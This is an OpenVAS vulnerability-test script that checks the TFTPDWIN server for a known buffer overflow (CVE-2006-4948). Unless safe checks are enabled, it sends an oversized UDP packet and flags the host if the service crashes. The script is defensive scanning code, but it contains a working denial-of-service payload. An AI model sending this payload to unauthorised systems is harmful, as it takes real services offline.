###############################################################################
# OpenVAS Vulnerability Test
# $Id: ProSysInfo_tftpdwin_20131.nasl 8287 2010-07-05 10:40:56Z mime $
#
# ProSysInfo TFTPDWIN Remote Buffer Overflow Vulnerability
#
# Authors:
# Michael Meyer
#
# Copyright:
# Copyright (c) 2009 Greenbone Networks GmbH
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################

if (description)
{
 script_id(100265);
 script_bugtraq_id(20131);
 script_cve_id("CVE-2006-4948");
 script_version ("1.0");
 script_tag(name:"cvss_base", value:"7.5");
 script_tag(name:"risk_factor", value:"High");

 script_name("ProSysInfo TFTPDWIN Remote Buffer Overflow Vulnerability");

desc = "Overview:
TFTPDWIN server is prone to a remote buffer-overflow vulnerability
because the application fails to properly bounds-check user-supplied
input before copying it to an insufficiently sized memory buffer.

An attacker may exploit this issue to execute arbitrary code in the
context of the TFTP server process.

TFTPDWIN 0.4.2 is vulnerable; other versions may be affected as well.

References:
http://www.securityfocus.com/bid/20131
http://www.prosysinfo.com.pl/tftpserver/

Risk factor : Low";

 script_description(desc);
 script_summary("Determine if TFTPDWIN is vulnerable to DoS");
 script_category(ACT_DENIAL);
 script_family("Denial of Service");
 script_copyright("This script is Copyright (C) 2009 Greenbone Networks GmbH");
 script_dependencies("tftpd_detect.nasl");
 script_require_keys("Services/udp/tftp");
 exit(0);
}


include("tftp.inc");

if(safe_checks())exit(0);

port = get_kb_item('Services/udp/tftp');
if (! port) port = 69;
if (get_kb_item('tftp/'+port+'/backdoor')) exit(0);

if ( tftp_alive(port: port) ) {
  boom = crap(1000);
  soc = open_sock_udp(port);
  send(socket:soc, data:boom);
  sleep(1);
  close(soc);

  if(!tftp_alive(port: port)) {
     security_warning(port:port,proto:"udp");
     exit(0);
  }
}

exit(0);
